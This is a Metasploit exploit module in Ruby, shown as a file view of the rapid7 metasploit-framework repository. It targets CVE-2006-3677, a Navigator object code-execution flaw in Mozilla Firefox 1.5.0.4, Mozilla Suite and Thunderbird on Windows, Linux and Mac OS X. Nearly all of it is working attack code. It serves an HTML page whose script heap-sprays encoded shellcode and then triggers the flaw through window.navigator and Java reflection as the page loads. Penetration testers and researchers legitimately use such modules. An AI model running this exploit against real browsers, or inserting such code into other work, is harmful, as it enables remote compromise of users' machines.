Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
11
# include Msf::Exploit::Remote::BrowserAutopwn
12
# autopwn_info({
13
# :ua_name => HttpClients::FF,
14
# :ua_minver => "1.5.0",
15
# :ua_maxver => "1.5.1",
16
# :javascript => true,
17
# :rank => NormalRanking, # reliable memory corruption
18
# :vuln_test => %Q|
19
# is_vuln = false;
20
# if (navigator.javaEnabled()){
21
# is_vuln = true;
22
# }
23
# |,
24
# })
25
26
def initialize(info = {})
27
super(
28
update_info(
29
info,
30
'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
31
'Description' => %q{
32
This module exploits a code execution vulnerability in the Mozilla
33
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
34
requires the Java plugin to be installed.
35
},
36
'License' => MSF_LICENSE,
37
'Author' => ['hdm'],
38
'References' => [
39
['CVE', '2006-3677'],
40
['OSVDB', '27559'],
41
['BID', '19192'],
42
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
43
],
44
'Payload' => {
45
'Space' => 512,
46
'BadChars' => "",
47
},
48
'Platform' => %w{win linux osx},
49
'Targets' => [
50
[
51
'Firefox 1.5.0.4 Windows x86',
52
{
53
'Platform' => 'win',
54
'Arch' => ARCH_X86,
55
'Ret' => 0x08000800,
56
'Fill' => "%u0800",
57
}
58
],
59
[
60
'Firefox 1.5.0.4 Linux x86',
61
{
62
'Platform' => 'linux',
63
'Arch' => ARCH_X86,
64
'Ret' => -0x58000000,
65
'Fill' => "%ua8a8",
66
}
67
],
68
[
69
'Firefox 1.5.0.4 Mac OS X PPC',
70
{
71
'Platform' => 'osx',
72
'Arch' => ARCH_PPC,
73
'Ret' => 0x0c000000,
74
'Fill' => "%u0c0c",
75
}
76
],
77
[
78
'Firefox 1.5.0.4 Mac OS X x86',
79
{
80
'Platform' => 'osx',
81
'Arch' => ARCH_X86,
82
'Ret' => 0x1c000000,
83
'Fill' => "%u1c1c",
84
}
85
],
86
],
87
'DisclosureDate' => '2006-07-25',
88
'Notes' => {
89
'Reliability' => UNKNOWN_RELIABILITY,
90
'Stability' => UNKNOWN_STABILITY,
91
'SideEffects' => UNKNOWN_SIDE_EFFECTS
92
}
93
)
94
)
95
end
96
97
def on_request_uri(cli, request)
98
# Re-generate the payload
99
return if ((p = regenerate_payload(cli)) == nil)
100
101
print_status("Sending #{self.name}")
102
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
103
104
# Handle the payload
105
handler(cli)
106
end
107
108
def generate_html(payload)
109
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
110
111
return %Q|
112
<html><head>
113
<script>
114
function Exploit() {
115
if (window.navigator.javaEnabled) {
116
var shellcode = unescape("#{enc_code}");
117
var b = unescape("#{target['Fill']}");
118
while (b.length <= 0x400000) b+=b;
119
120
var c = new Array();
121
for (var i =0; i<36; i++) {
122
c[i] =
123
b.substring(0, 0x100000 - shellcode.length) + shellcode +
124
b.substring(0, 0x100000 - shellcode.length) + shellcode +
125
b.substring(0, 0x100000 - shellcode.length) + shellcode +
126
b.substring(0, 0x100000 - shellcode.length) + shellcode;
127
}
128
129
window.navigator = (#{target['Ret']} / 2);
130
try {
131
java.lang.reflect.Runtime.newInstance(
132
java.lang.Class.forName("java.lang.Runtime"), 0
133
);
134
}catch(e){
135
136
}
137
}
138
}
139
</script>
140
</head><body onload='Exploit()'>Please wait...</body></html>
141
|
142
end
143
end
144
145